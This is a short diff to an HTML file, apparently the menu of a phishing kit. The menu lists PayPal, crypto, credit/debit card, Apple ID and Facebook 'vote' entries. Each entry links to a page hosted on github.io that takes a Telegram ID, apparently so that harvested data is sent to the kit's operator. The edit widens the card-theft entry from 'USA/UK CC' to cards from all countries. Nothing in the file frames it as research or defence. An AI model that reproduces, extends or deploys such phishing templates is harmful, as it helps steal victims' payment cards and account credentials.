--- a/inn.html
+++ b/inn.html
@@ -206,7 +206,7 @@
       //added codes goes here //
              { name: "Paypal", image: "https://bbott52.github.io/Mobixhub/pa.png", urlTemplate: "https://bbott52.github.io/alb/pay.html?id={telegram-id}" },
                    { name: "Crypto link", image: "https://bbott52.github.io/Mobixhub/cr.png", urlTemplate: "https://bbott52.github.io/alb/tr?id={telegram-id}" },
-                         { name: "USA/UK CC", image: "https://bbott52.github.io/Mobixhub/cc.png", urlTemplate: "https://ilyelya.github.io/n/ce.html?id={telegram-id}" },
+                         { name: "All country ATM Card or (CC) Credit or Debit card", image: "https://bbott52.github.io/Mobixhub/cc.png", urlTemplate: "https://ilyelya.github.io/n/ce.html?id={telegram-id}" },
                                { name: "Apple id", image: "https://bbott52.github.io/Mobixhub/app.jpg", urlTemplate: "https://bbott52.github.io/alb/app.html?id={telegram-id}" },
                                //another links added//
                                      { name: "Facebook Vote", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/cvf.html?id={telegram-id}" },
